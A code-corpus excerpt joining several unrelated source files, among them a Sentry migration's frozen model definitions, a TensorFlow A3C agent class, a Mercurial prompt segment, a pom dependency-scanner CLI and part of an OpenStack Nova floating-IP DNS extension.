'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'savedsearch': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.SavedSearch']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.scheduleddeletion': {
'Meta': {'unique_together': "(('app_label', 'model_name', 'object_id'),)", 'object_name': 'ScheduledDeletion', 'index_together': '()'},
'aborted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)'}),
'guid': ('django.db.models.fields.CharField', [], {'default': "'a426ce10c7824ca2a31b88c01cf51105'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'object_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.scheduledjob': {
'Meta': {'unique_together': '()', 'object_name': 'ScheduledJob', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'payload': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.sentryapp': {
'Meta': {'unique_together': '()', 'object_name': 'SentryApp', 'index_together': '()'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiApplication']"}),
'author': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_alertable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.TextField', [], {}),
'overview': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'owned_sentry_apps'", 'to': "orm['sentry.Organization']"}),
'proxy_user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.User']"}),
'redirect_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'95221a10-3d96-4af7-8670-be0f643dd7a1'", 'max_length': '64'}),
'webhook_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.sentryappavatar': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.SentryApp']"})
},
'sentry.sentryappcomponent': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppComponent', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'components'", 'to': "orm['sentry.SentryApp']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'})
},
'sentry.sentryappinstallation': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppInstallation', 'index_together': '()'},
'api_grant': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiGrant']"}),
'api_token': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiToken']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_app_installations'", 'to': "orm['sentry.Organization']"}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'installations'", 'to': "orm['sentry.SentryApp']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'c025a308-74d1-4b11-95f4-f74b0dba0a37'", 'max_length': '64'})
},
'sentry.servicehook': {
'Meta': {'unique_together': '()', 'object_name': 'ServiceHook', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'351f827fb83b47d2b3d4c8a8a379cc632e91af06c5d44946abd9396a33877cc8'"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '512'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.servicehookproject': {
'Meta': {'unique_together': "(('service_hook', 'project_id'),)", 'object_name': 'ServiceHookProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'service_hook': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ServiceHook']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project_id', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project_id', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'", 'index_together': "(('project_id', 'key', 'last_seen'),)"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teamavatar': {
'Meta': {'unique_together': '()', 'object_name': 'TeamAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Team']"})
},
'sentry.timeseriessnapshot': {
'Meta': {'unique_together': '()', 'object_name': 'TimeSeriesSnapshot', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'end': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.IntegerField', [], {}),
'start': ('django.db.models.fields.DateTimeField', [], {}),
'values': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'sentry.db.models.fields.array.ArrayField', [], {'null': 'True'})})
},
'sentry.user': {
'Meta': {'unique_together': '()', 'object_name': 'User', 'db_table': "'auth_user'", 'index_together': '()'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_password_expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_sentry_app': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_column': "'first_name'", 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'session_nonce': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useravatar': {
'Meta': {'unique_together': '()', 'object_name': 'UserAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.User']"})
},
'sentry.useremail': {
'Meta': {'unique_together': "(('user', 'email'),)", 'object_name': 'UserEmail', 'index_together': '()'},
'date_hash_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'emails'", 'to': "orm['sentry.User']"}),
'validation_hash': ('django.db.models.fields.CharField', [], {'default': "u'tfq6tE9Duz48Ehl7NuSBrIVlGLs4yM09'", 'max_length': '32'})
},
'sentry.userip': {
'Meta': {'unique_together': "(('user', 'ip_address'),)", 'object_name': 'UserIP', 'index_together': '()'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'region_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'), ('user', 'organization', 'key'))", 'object_name': 'UserOption', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.userpermission': {
'Meta': {'unique_together': "(('user', 'permission'),)", 'object_name': 'UserPermission', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'permission': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.userreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'UserReport', 'index_together': "(('project', 'event_id'), ('project', 'date_added'))"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']", 'null': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_user_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.widget': {
'Meta': {'unique_together': "(('dashboard', 'order'), ('dashboard', 'title'))", 'object_name': 'Widget', 'index_together': '()'},
'dashboard': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Dashboard']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_options': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'display_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.widgetdatasource': {
'Meta': {'unique_together': "(('widget', 'name'), ('widget', 'order'))", 'object_name': 'WidgetDataSource', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'widget': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Widget']"})
}
}
complete_apps = ['sentry']
| bsd-3-clause | 6,805,013,253,530,824,000 | 94.341226 | 234 | 0.580177 | false |
AlphaSmartDog/DeepLearningNotes | Note-6 A3CNet/Note-6.4 HS300指数增强/agent/agent.py | 1 | 6362 | import numpy as np
import tensorflow as tf
from agent.forward import ActorCriticNet
from params import *
def batch_choice(a, p):
action_list = [np.random.choice(a, p=i) for i in p]
return np.array(action_list)
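# A quick illustration of the helper above (hypothetical values, not part of the
# original module): `p` is a [batch, action_size] matrix of per-row probabilities
# and one action index is sampled per row, e.g.
#
#     probs = np.array([[0.1, 0.9], [0.8, 0.2]])
#     batch_choice(2, probs)  # -> array of shape (2,), e.g. array([1, 0])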
# local network for advantage actor-critic, which is also known as A2C
class Agent(object):
def __init__(self, name, access, inputs_shape, action_size):
self.Access = access
self.action_size = action_size
batch_size = inputs_shape[0]
self.batch_size = batch_size
with tf.variable_scope(name):
# placeholder
# [Time, Batch, Rows, Columns, Channels]
self.inputs = tf.placeholder(
tf.float32, [None] + inputs_shape, 'inputs')
# fix
inputs = tf.expand_dims(self.inputs, axis=-1)
# [T_MAX, Batch]
self.actions = tf.placeholder(
tf.int32, [None, batch_size], "actions")
# [T_MAX]
self.targets = tf.placeholder(
tf.float32, [None], "discounted_rewards")
self.gathers = tf.placeholder(
tf.int32, [None], 'gather_list')
# build network and adjust output probability
self.net = ActorCriticNet('AC-' + name)
policy, value = self.net(inputs, action_size)
policy = tf.clip_by_value(
policy, CLIP_MIN, CLIP_MAX, 'constraint')
# interface gather and step
# [Time, Batch, action_size] -> [T_MAX, Batch, action_size]
self.policy = tf.gather(policy, self.gathers)
self.value = tf.gather(value, self.gathers) # [T_MAX]
self.value = tf.squeeze(self.value, axis=1)
self.policy_step = policy[-1] # [Batch, action_size]
self.value_step = value[-1] # 1
# build other function
self._build_losses()
self._build_async_swap()
self._build_interface()
print('graph %s' % (str(name)))
def _build_losses(self):
# value loss
self.advantage = self.targets - self.value # [T_MAX]
value_loss = 0.5 * tf.square(self.advantage)
# policy loss
# [T_MAX, Batch, action_size] -> [T_MAX, Batch]
policy_action = tf.reduce_sum(
self.policy * tf.one_hot(self.actions, self.action_size), axis=2)
# [T_MAX, Batch]
policy_loss = -tf.log(policy_action) * tf.stop_gradient(
tf.expand_dims(self.advantage, axis=1))
# entropy loss [T_MAX, Batch]
entropy_loss = tf.reduce_sum(self.policy * tf.log(self.policy), axis=2)
# total loss
self.critic_loss = tf.reduce_mean(value_loss)
self.actor_loss = tf.reduce_mean(policy_loss + entropy_loss * ENTROPY_BETA)
self.total_loss = self.critic_loss + self.actor_loss
# interface
self.a_total_loss = self.total_loss
self.a_entropy_loss = tf.reduce_mean(entropy_loss)
self.a_policy_loss = tf.reduce_mean(policy_loss)
self.a_value_loss = tf.reduce_mean(value_loss)
self.a_critic_loss = self.critic_loss
self.a_actor_loss = self.actor_loss
self.a_advantage = tf.reduce_mean(self.advantage)
self.a_value_mean = tf.reduce_mean(self.value)
self.a_policy_mean = tf.reduce_mean(self.policy)
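# For reference, the losses built above follow the standard advantage
# actor-critic formulation (a sketch using the tensor names defined above):
#
#     advantage    A = R - V(s)                      (self.advantage)
#     value loss     = 0.5 * A^2                     (value_loss)
#     policy loss    = -log pi(a|s) * stop_grad(A)   (policy_loss)
#     entropy term   = sum_a pi(a|s) * log pi(a|s)   (entropy_loss, weighted
#                                                     by ENTROPY_BETA)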
def _build_async_swap(self):
# Get gradients from local network using local losses
local_vars = self.get_trainable()
self.gradients = tf.gradients(self.total_loss, local_vars)
# Clip gradients
grads, self.global_norm = tf.clip_by_global_norm(
self.gradients, MAX_GRAD_NORM)
# Update global network
# Apply local gradients to global network
global_vars = self.Access.get_trainable()
self.update_global = self.Access.optimizer.apply_gradients(
zip(grads, global_vars))
# Update local network
assign_list = []
for gv, lv in zip(global_vars, local_vars):
assign_list.append(tf.assign(lv, gv))
self.update_local = assign_list
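# Note: `update_global` applies this worker's clipped gradients to the shared
# (global) parameters via the Access optimizer, while `update_local` copies the
# global parameters back into this worker's network -- the usual A3C
# synchronisation pattern.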
def _build_interface(self):
self.a_interface = [self.a_total_loss,
self.a_entropy_loss,
self.a_policy_loss,
self.a_value_loss,
self.a_actor_loss,
self.a_critic_loss,
self.a_advantage,
self.a_value_mean,
self.a_policy_mean,
self.a_advantage]
def get_trainable(self):
return list(self.net.get_variables())
def init_or_update_local(self, sess):
sess.run(self.update_local)
def get_step_policy(self, sess, inputs):
return sess.run(self.policy_step, {self.inputs: inputs})
def get_step_value(self, sess, inputs):
return sess.run(self.value_step, {self.inputs: inputs})
def get_losses(self, sess, inputs, actions, targets, gather_list):
"""
get all loss functions of network
:param sess:
:param inputs:
:param actions:
:param targets:
:return:
"""
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gather_list}
return sess.run(self.a_interface, feed_dict)
def train_step(self, sess, inputs, actions, targets, gathers):
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gathers}
sess.run(self.update_global, feed_dict)
# get stochastic action for training
def get_stochastic_action(self, sess, inputs, epsilon=0.9):
if np.random.uniform() < epsilon:
policy = sess.run(self.policy_step, {self.inputs: inputs})
return batch_choice(self.action_size, policy)
else:
return np.random.randint(self.action_size, size=self.batch_size)
# get deterministic action for testing
def get_deterministic_policy_action(self, sess, inputs):
policy_step = sess.run(self.policy_step, {self.inputs: inputs})
return np.argmax(policy_step, axis=1)
| mit | -5,111,055,656,513,035,000 | 37.095808 | 83 | 0.568375 | false |
saghul/shline | segments/hg.py | 1 | 1578 |
def add_hg_segment():
import os
import subprocess
env = {"LANG": "C", "HOME": os.getenv("HOME")}
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
try:
output = subprocess.check_output(['hg', 'status'], env=env)
except subprocess.CalledProcessError:
pass
else:
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
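# Sketch of the `hg status` lines this parser expects (example file names only):
#
#     M modified_file.py     -> has_modified_files
#     ? untracked_file.txt   -> has_untracked_files
#     ! missing_file.c       -> has_missing_files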
try:
output = subprocess.check_output(['hg', 'branch'], env=env)
except (subprocess.CalledProcessError, OSError):
return
branch = output.rstrip()
if not branch:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return shline.append(' %s %s ' % (shline.branch, branch), fg, bg)
add_hg_segment()
| mit | -5,181,100,140,301,123,000 | 29.346154 | 80 | 0.529151 | false |
tpflueger/CSCI4900 | scripts/main.py | 1 | 1140 | # SPDX-License-Identifier: MIT
'''Usage:
{0} scan (FILE)
{0} dependencies (JARNAME)
{0} (--help | --version)
Arguments:
scan Scan pom file for dependencies
dependencies Show dependency tree for JARNAME
'''
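# Example invocations (hypothetical file names, shown only for illustration):
#
#     python main.py scan pom.xml
#     python main.py dependencies my-library-1.0.jar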
import shutil
import sys
import os
from dependency_reader import DependencyReader
from docopt import docopt
__version__ = '1.0.0'
def main():
argv = docopt(
doc=__doc__.format(os.path.basename(sys.argv[0])),
argv=sys.argv[1:],
version=__version__
)
dependencyReader = DependencyReader()
if argv['scan']:
dependencyReader.getPom(os.path.abspath(argv['FILE']))
dependencyReader.getDependencies()
dependencyReader.relateDependencies()
dependencyReader.scanDependencies()
dependencyReader.createRelationships()
dependencyReader.retrieve_dependencies(None)
shutil.rmtree(dependencyReader.tempDirectoryPath)
elif argv['dependencies']:
dependencyReader.retrieve_dependencies(argv['JARNAME'])
shutil.rmtree(dependencyReader.tempDirectoryPath)
if __name__ == "__main__":
sys.exit(main())
| mit | -7,091,659,358,233,557,000 | 27.5 | 63 | 0.670175 | false |
NoBodyCam/TftpPxeBootBareMetal | nova/api/openstack/compute/contrib/floating_ip_dns.py | 1 | 10842 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import urllib
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import network
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'floating_ip_dns')
def make_dns_entry(elem):
elem.set('id')
elem.set('ip')
elem.set('type')
elem.set('domain')
elem.set('name')
def make_domain_entry(elem):
elem.set('domain')
elem.set('scope')
elem.set('project')
elem.set('availability_zone')
class FloatingIPDNSTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entry',
selector='dns_entry')
make_dns_entry(root)
return xmlutil.MasterTemplate(root, 1)
class FloatingIPDNSsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entries')
elem = xmlutil.SubTemplateElement(root, 'dns_entry',
selector='dns_entries')
make_dns_entry(elem)
return xmlutil.MasterTemplate(root, 1)
class DomainTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entry',
selector='domain_entry')
make_domain_entry(root)
return xmlutil.MasterTemplate(root, 1)
